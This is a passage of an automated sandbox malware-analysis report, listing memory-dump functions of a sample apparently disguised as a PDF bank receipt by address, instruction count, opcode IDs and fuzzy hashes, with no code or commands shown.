                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c1a4f2ba31971a60cc9122e06387948634c123d3549bc54dd067fe83ce175165
                                                                                                                                                          • Instruction ID: e3d6dcf9b43f50b7a8a2683c085d6ad8d596d26428197b69325441b7df44cda8
                                                                                                                                                          • Opcode Fuzzy Hash: c1a4f2ba31971a60cc9122e06387948634c123d3549bc54dd067fe83ce175165
                                                                                                                                                          • Instruction Fuzzy Hash: B9A10A74E04219DFCB14CF69D990AAEBBB2FF88300F2091A9D919AB315DB319D81CF50
                                                                                                                                                          Function 056F0950 Relevance: .2, Instructions: 216COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c0454b812a733ce21ed2d8082ec45e141cd7e4e0aba63a7189ab401f31dc05c3
                                                                                                                                                          • Instruction ID: 8029f61be9d002632c20f3487e36f8298646bdb1f929bf65bcf6930ae66e0d59
                                                                                                                                                          • Opcode Fuzzy Hash: c0454b812a733ce21ed2d8082ec45e141cd7e4e0aba63a7189ab401f31dc05c3
                                                                                                                                                          • Instruction Fuzzy Hash: C9914E74E052198FDB14CF69C984AAEFBF2BF88310F14D1AAD509A7316DB309A41CF61
                                                                                                                                                          Function 056F0980 Relevance: .2, Instructions: 216COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 10e96b81ea2a1f6e8acbe6e1abfc2105aaa8a56ac69e84f010ae3a66efc8965d
                                                                                                                                                          • Instruction ID: 35b7b666edc0f9a3536831269d9961cf3e7bb362a7bd6e1ea12f24e745777050
                                                                                                                                                          • Opcode Fuzzy Hash: 10e96b81ea2a1f6e8acbe6e1abfc2105aaa8a56ac69e84f010ae3a66efc8965d
                                                                                                                                                          • Instruction Fuzzy Hash: BAA12C74E052199FDB14CFA9C984AAEFBB2FF88310F14D16AD509A7316DB309941CF51
                                                                                                                                                          Function 056F0920 Relevance: .2, Instructions: 207COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4b107c87a5f109f4896db0f8ee198dcb4ec3910942e1704248c9211ee3003ed2
                                                                                                                                                          • Instruction ID: f8c604a96084de0bbdbba6b3d181dada8eb8e7d6460281042e1e9622afd7b561
                                                                                                                                                          • Opcode Fuzzy Hash: 4b107c87a5f109f4896db0f8ee198dcb4ec3910942e1704248c9211ee3003ed2
                                                                                                                                                          • Instruction Fuzzy Hash: FB913C74E052199FCB14CFA9D984AAEFBF2BF89310F24D1AAD509A7316DB309941CF50
                                                                                                                                                          Function 056F5F59 Relevance: .2, Instructions: 199COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5300a67f8aa141e5bdf48e712becedd84b408ab73585f189906b7441c6440244
                                                                                                                                                          • Instruction ID: e66cab43aee024c75aea7e0db89eb8c402533b732d83ccc0122f49aab0df6fe7
                                                                                                                                                          • Opcode Fuzzy Hash: 5300a67f8aa141e5bdf48e712becedd84b408ab73585f189906b7441c6440244
                                                                                                                                                          • Instruction Fuzzy Hash: BC815574D1120ADFCB04CFA9D9445EEFFB2BF88300F10A66AE105A7255E7359A46CF94
                                                                                                                                                          Function 01654218 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 63b02cf89386c1f37bba53c823f02dacf8039f2fa5c96cc49b7d32241451b484
                                                                                                                                                          • Instruction ID: 60df1aa42a6ea814b2fd19c6e49cee598bbf025f773569b25d0420ecd200d260
                                                                                                                                                          • Opcode Fuzzy Hash: 63b02cf89386c1f37bba53c823f02dacf8039f2fa5c96cc49b7d32241451b484
                                                                                                                                                          • Instruction Fuzzy Hash: 0F811574E1521ACFCB44CFA9C9859AEFBF1FF88350F1494A9D815AB224D730AA42CF50
                                                                                                                                                          Function 01654228 Relevance: .2, Instructions: 196COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2bd434a6abd02e478fec16ad14a854298b95abcc830defa5395e5085608785c5
                                                                                                                                                          • Instruction ID: c3cf37e63213529468004b9d13c83f7b40e03e3e18dcf9df84ba0da12597d9c1
                                                                                                                                                          • Opcode Fuzzy Hash: 2bd434a6abd02e478fec16ad14a854298b95abcc830defa5395e5085608785c5
                                                                                                                                                          • Instruction Fuzzy Hash: 7E91E474E15219CFCB44CFA9C9859AEFBF1FF88350F149569D815AB224D730AA42CF50
                                                                                                                                                          Function 0B844DB8 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b325d8e4ae6005574a9efa563e975808f4e8ef932c93cfc7d9cb44f14c80b64f
                                                                                                                                                          • Instruction ID: 7f23ee98492cf80699d21e2b2150a689add3b6e7b3ef826224228d44978d5be5
                                                                                                                                                          • Opcode Fuzzy Hash: b325d8e4ae6005574a9efa563e975808f4e8ef932c93cfc7d9cb44f14c80b64f
                                                                                                                                                          • Instruction Fuzzy Hash: FF81E074E0520D8FCB14CFA9D681ADEFBF2FB89210F28942AD515F7364D7349A418B64
                                                                                                                                                          Function 056F5FC1 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f96995ac7074c304e6ad6c5f47a90d5e1dc9b45efa9fa05b055c186dbf6ddc55
                                                                                                                                                          • Instruction ID: 9a9b1a1feef1b12398995078bffaca065cbd90d2bc6b74b898f1f22bdd9de9ed
                                                                                                                                                          • Opcode Fuzzy Hash: f96995ac7074c304e6ad6c5f47a90d5e1dc9b45efa9fa05b055c186dbf6ddc55
                                                                                                                                                          • Instruction Fuzzy Hash: FD713470D0120ADFCB04CFAAD9406EEFFB2BF88300F14966AE115AB255D7349A46CF94
                                                                                                                                                          Function 056F5FD0 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 09783d7366c7ee9997dd2412a8ee602c4aaf74d8853b53f0726243033bdff52d
                                                                                                                                                          • Instruction ID: ded21c1751fcdfa758cc672037e955b15465361cdb8a5d4dfcfa8b309d78ebf2
                                                                                                                                                          • Opcode Fuzzy Hash: 09783d7366c7ee9997dd2412a8ee602c4aaf74d8853b53f0726243033bdff52d
                                                                                                                                                          • Instruction Fuzzy Hash: F3711570D01219DFCB04CFAAD9405EEFFB2BF89300F14A62AE116AB255D7349A46CF94
                                                                                                                                                          Function 056F6418 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 558fae6fb33f97bd2e0029f1cb712e2decab76c8b95d7c1a1dec0e3d83350d61
                                                                                                                                                          • Instruction ID: 68b5c0a837479c46f3fc7f745a080421feb9cc0cc007cd447b7efed5f1d310ed
                                                                                                                                                          • Opcode Fuzzy Hash: 558fae6fb33f97bd2e0029f1cb712e2decab76c8b95d7c1a1dec0e3d83350d61
                                                                                                                                                          • Instruction Fuzzy Hash: 7E615974E06209DFCB08DFA9E5409AEFBB2FB89300F10D52AE516A7354DB349A16CF54
                                                                                                                                                          Function 0B844DC8 Relevance: .2, Instructions: 167COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 91595f838ef8e6220c6c928d7874ac853097b012a43f262c5895775bc0ee3bca
                                                                                                                                                          • Instruction ID: e85e8f51d4fd0cfe465efb3ac15e9a8703cbaeb0cf4c64984d1ed9b7e9d29f57
                                                                                                                                                          • Opcode Fuzzy Hash: 91595f838ef8e6220c6c928d7874ac853097b012a43f262c5895775bc0ee3bca
                                                                                                                                                          • Instruction Fuzzy Hash: 6371E074E0520D9FCB14CFA9D6809DEFBF2FB89210F28942AD515B7364DB309A418B64
                                                                                                                                                          Function 016555E8 Relevance: .2, Instructions: 167COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 60b2df1917fcfe50b0b94a7d27a07cffddee757147182b27aa7cd8e7c34e6410
                                                                                                                                                          • Instruction ID: 127a487207ca73c3deb1d2c5b68f5850e6c3f560e6d4983e00986752fdbe79b8
                                                                                                                                                          • Opcode Fuzzy Hash: 60b2df1917fcfe50b0b94a7d27a07cffddee757147182b27aa7cd8e7c34e6410
                                                                                                                                                          • Instruction Fuzzy Hash: 6671E374E05219CFCB44CFA9D9945EEFBF2FF89210F24942AD456BB324D7309A428B64
                                                                                                                                                          Function 016555D8 Relevance: .2, Instructions: 167COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: bdce28d0ee4d1fec85d713a3ea8efbb96ac722f32d4747f9839d1f38f56dda6f
                                                                                                                                                          • Instruction ID: 6c3737d87ee485d09ea81455f43e42eb8b39d183b04b4fdfa8d43edbd8e10dc9
                                                                                                                                                          • Opcode Fuzzy Hash: bdce28d0ee4d1fec85d713a3ea8efbb96ac722f32d4747f9839d1f38f56dda6f
                                                                                                                                                          • Instruction Fuzzy Hash: F0611470E05219CFCB44CFA9D9945EEFBF2FF89310F24902AD456BB224D3309A428B64
                                                                                                                                                          Function 056F6428 Relevance: .2, Instructions: 163COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 514c840e133f9289e1ee1dacec676dce495019ceea7cf755bc4e7cf0ef63fb64
                                                                                                                                                          • Instruction ID: 0661810fba734d3fea4ae705bc0282c8aa5696de03a4f539f9d70195f4a64b96
                                                                                                                                                          • Opcode Fuzzy Hash: 514c840e133f9289e1ee1dacec676dce495019ceea7cf755bc4e7cf0ef63fb64
                                                                                                                                                          • Instruction Fuzzy Hash: 87615974E05209DFCB08DFA9E5409AEFBB2FB89300F10D52AE516A7354DB349A06CF54
                                                                                                                                                          Function 0B846451 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0dfeffe55ea33e45219809b3d5cfb3f5713ed33f08fd8dbeae49cd3718cee6d9
                                                                                                                                                          • Instruction ID: 8c0f9af4aca92cdd2423ffb2f0daca6445e328146bf88b729a625cc39502bd76
                                                                                                                                                          • Opcode Fuzzy Hash: 0dfeffe55ea33e45219809b3d5cfb3f5713ed33f08fd8dbeae49cd3718cee6d9
                                                                                                                                                          • Instruction Fuzzy Hash: 7E511674D0521E8FCF04CFA6C4401EEFBF1AF8A605F1498AAC525B7264E77896428F65
                                                                                                                                                          Function 0B846460 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c5b2074971d21d7c8c27902c58c2a12626344693e3c27786e0b34bf5aabbd899
                                                                                                                                                          • Instruction ID: d510b72ccc96103b2fc34b3d8864a6077c92c23b04ae01f2bce712e80c56c928
                                                                                                                                                          • Opcode Fuzzy Hash: c5b2074971d21d7c8c27902c58c2a12626344693e3c27786e0b34bf5aabbd899
                                                                                                                                                          • Instruction Fuzzy Hash: AE510574D0521EDFCF04CFA6C4405EEFBF2EB8AA05F14986AC525B7224E73896418F69
                                                                                                                                                          Function 0A0F0290 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ed16f89e1d0e45b1fb492269fa472c92ebad1936d010b8b39f96535ab900da40
                                                                                                                                                          • Instruction ID: 17726e718ca82ca223221d493e14d9fc8478e4ad733e2594024f6e275d45fa21
                                                                                                                                                          • Opcode Fuzzy Hash: ed16f89e1d0e45b1fb492269fa472c92ebad1936d010b8b39f96535ab900da40
                                                                                                                                                          • Instruction Fuzzy Hash: DD5108B4E042198FDB14CFA9C5805AEBBF2FF89304F2485A9D518BB216D7355D42CFA1
                                                                                                                                                          Function 0A0F104B Relevance: .1, Instructions: 132COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5232870bb1b7877d54bf273853ee8aacc5acdb0bbfb363b23c5e397abe53f70d
                                                                                                                                                          • Instruction ID: c07f9e194856095fca64e189852618e2ae7e728783ff4812387d87c4bc8d8597
                                                                                                                                                          • Opcode Fuzzy Hash: 5232870bb1b7877d54bf273853ee8aacc5acdb0bbfb363b23c5e397abe53f70d
                                                                                                                                                          • Instruction Fuzzy Hash: 45510874E042198FCB14CFA9C9805AEBBF2FF89304F24866AD508AB756D735AD41CF60
                                                                                                                                                          Function 056FC113 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fc7b49254c70263a40b80834e4128fe7e6d426bb5c49fb1ee729dcc83dd45ad9
                                                                                                                                                          • Instruction ID: 046216d7dd3c8006be7bced519f7c8936b13dfcccb79c98f6d4d4358a7aabf96
                                                                                                                                                          • Opcode Fuzzy Hash: fc7b49254c70263a40b80834e4128fe7e6d426bb5c49fb1ee729dcc83dd45ad9
                                                                                                                                                          • Instruction Fuzzy Hash: B641D531D0D3848FD71ACF69D8105AABFB2AF86310F19C1ABD048EB266CB344D55CB62
                                                                                                                                                          Function 0B844B98 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b04542740c13cf9ad30aecdfd68c499351d229105f2d198781e1cab2a505504f
                                                                                                                                                          • Instruction ID: 4ac0524d20a1e17f8e5cc65fa8d00a9d863d4023bc0c54a2797660c964c5a9e9
                                                                                                                                                          • Opcode Fuzzy Hash: b04542740c13cf9ad30aecdfd68c499351d229105f2d198781e1cab2a505504f
                                                                                                                                                          • Instruction Fuzzy Hash: A741C670D0560A9FCB44CFAAC5816AEFBF2BF89300F28C06AD415E7364D7749A418FA5
                                                                                                                                                          Function 0B844BA8 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e4361ffe06a14addcb0f21a83a6bd4497f82b3eedf5434480f7341a06e3e273d
                                                                                                                                                          • Instruction ID: 71f10baf5976dde7aa5bc6cf3e4a4461aff33b318180680219864090f06fab4f
                                                                                                                                                          • Opcode Fuzzy Hash: e4361ffe06a14addcb0f21a83a6bd4497f82b3eedf5434480f7341a06e3e273d
                                                                                                                                                          • Instruction Fuzzy Hash: F241C5B0D0560E9BCB44CFAAC5816AEFBB2BF88300F24D06AD415F7354DB749A418F95
                                                                                                                                                          Function 01655850 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cb57b2f133af65a908e986202fbc2ecd91b28ffec343979bbdfcf45d3fc4f2e5
                                                                                                                                                          • Instruction ID: 7eac8117411248d1925a826d4730b9dcecd4a2df286e8f4a2ad9e2a757031e3d
                                                                                                                                                          • Opcode Fuzzy Hash: cb57b2f133af65a908e986202fbc2ecd91b28ffec343979bbdfcf45d3fc4f2e5
                                                                                                                                                          • Instruction Fuzzy Hash: EB41E6B0E0520A9FCB48CFA9D8845AEFBF2FF89310F14C56AC815A7214E7349A41CF95
                                                                                                                                                          Function 01655860 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 19c302ac5d401b731a74f70c0ab71551a4cda059d29c746e2730f16bbc83e520
                                                                                                                                                          • Instruction ID: e319bb332dfb351586593c01f9f66e212ff4295ca49b7a328b99dae2eb521a04
                                                                                                                                                          • Opcode Fuzzy Hash: 19c302ac5d401b731a74f70c0ab71551a4cda059d29c746e2730f16bbc83e520
                                                                                                                                                          • Instruction Fuzzy Hash: 4141F7B0E0160ADFDB44CFA9D9845AEFBF2BF88310F14D56AC815A7314E7349A418F94
                                                                                                                                                          Function 0B840007 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4b8a01c67eddf1b7105c4fa5900a8984c31e226da2885005bfd4d407415bc1e1
                                                                                                                                                          • Instruction ID: f8d6ad95bd5af5d6acdcd3636e273c74784f0df77531d2a01fa93a8f2b2ec7b4
                                                                                                                                                          • Opcode Fuzzy Hash: 4b8a01c67eddf1b7105c4fa5900a8984c31e226da2885005bfd4d407415bc1e1
                                                                                                                                                          • Instruction Fuzzy Hash: 2631DF71E097958FD71ACF6B885068ABFF3AFCA200F09C0ABD448AB165D7341945CF11
                                                                                                                                                          Function 0165C4B8 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f8677c7e6ab53257adf1bf7591e26912af322c855c87639afde7a004ea9f0d51
                                                                                                                                                          • Instruction ID: 3286ffe9950b7e78ca0676a4ebad77155100c80e3cec419b10f2e4ddfa1c8d9d
                                                                                                                                                          • Opcode Fuzzy Hash: f8677c7e6ab53257adf1bf7591e26912af322c855c87639afde7a004ea9f0d51
                                                                                                                                                          • Instruction Fuzzy Hash: 28210871E116199BEB58CFABE8416EEFBF7AFC8300F14C03AD918A7214DB305A018B51
                                                                                                                                                          Function 056FC1B8 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 33c11db83d2f39ebcbdcf0947edf39aaf33fb14859f6c7e420d5c3021808bab2
                                                                                                                                                          • Instruction ID: 207fda767cee35981426d1bc5643dd42006718f0792ff0092128f4bdcf688e9e
